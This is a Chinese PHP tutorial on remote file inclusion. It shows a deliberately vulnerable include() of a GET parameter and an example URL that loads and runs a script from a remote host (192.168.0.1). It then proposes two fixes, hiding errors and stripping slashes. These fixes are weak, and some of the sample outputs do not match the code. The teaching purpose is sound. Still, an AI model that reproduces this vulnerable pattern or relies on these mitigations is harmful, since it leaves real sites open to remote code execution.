快捷導(dǎo)航

PHP 網(wǎng)絡(luò)開發(fā)詳解之遠程文件包含漏洞

更新時間：2010年04月25日 17:30:04 作者：

由于PHP支持使用相同的函數(shù)(Function)對本地文件和遠程文件進行操作。因此，一些惡意用戶通過強行使網(wǎng)站上的PHP代碼（Code）包含自己的文件來實現(xiàn)執(zhí)行自己腳本的目的。

以下代碼（Code）實現(xiàn)了根據(jù)瀏覽器地址欄參數(shù)的文件名稱包含不同文件的功能。

 
<?php 
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名 
include("$file_name "); //包含文件 
//一些其他操作 
?> 

這時，通過在地址欄上指定不同的文件名就可以實現(xiàn)包含不同文件并執(zhí)行的功能。例如，通過在瀏覽器上訪問http://localhost/test.php?filename=myinc.php就可以在代碼（Code）中包含并執(zhí)行myinc.php文件。
由于上面的代碼（Code）沒有進行任何錯誤處理，在瀏覽器上不加參數(shù)運行，所以將得到以下運行結(jié)果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
訪問者通過讀取這段錯誤信息，可以得知當(dāng)前的操作是一個文件包含操作。這時，可以在自己的服務(wù)器上放置一個相應(yīng)的腳本代碼。需要注意的是PHP在獲取遠程文件時獲得的是遠程服務(wù)器的最終輸出結(jié)果，而不是文件本身。該腳本代碼位于192.168.0.1服務(wù)器上，文件名為hello.txt，腳本代碼（Code）如下所示。

復(fù)制代碼代碼如下:

 
<?php 
echo "hello world!"; 
?> 

這時，通過在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以運行hello.txt中的腳本了。
為了解決這個問題，一種方式是完善代碼的錯誤信息，使訪問者無法知道當(dāng)前腳本正在包含參數(shù)中指定的文件。修改后的代碼（Code）如下所示。

復(fù)制代碼代碼如下:

 
<?php 
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名 
if(!@include("$file_name.php")) //包含文件 
{ 
die("頁面在瀏覽過程中出現(xiàn)錯誤"); 
} 
//一些其他操作 
?> 

修改后，如果在被包含的文件無法找到時將出現(xiàn)“頁面在瀏覽過程中出現(xiàn)錯誤”的錯誤信息，訪問者將無法獲得當(dāng)前頁面的具體操作信息。
第二種方式可以更加有效地防止遠程文件包含攻擊。方式是替換地址欄參數(shù)中的斜線“/”。這樣，在地址欄參數(shù)中輸入遠程文件地址時，代碼將無法正確地獲得參數(shù)。修改后的代碼（Code）如下所示。

復(fù)制代碼代碼如下:

 
<?php 
$file_name = str_replace('/', '', $_GET["filename"]); //獲得當(dāng)前文件名 
if(!@include("$file_name.php")) //包含文件 
{ 
die("頁面在瀏覽過程中出現(xiàn)錯誤"); 
} 
//一些其他操作 
?> 

這樣，在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt 時，實際上PHP代碼（Code）獲得的包含文件名稱是http:192.168.0.1bugstest6_test。頁面將不會包含遠程文件，并顯示相應(yīng)的錯誤信息。

您可能感興趣的文章: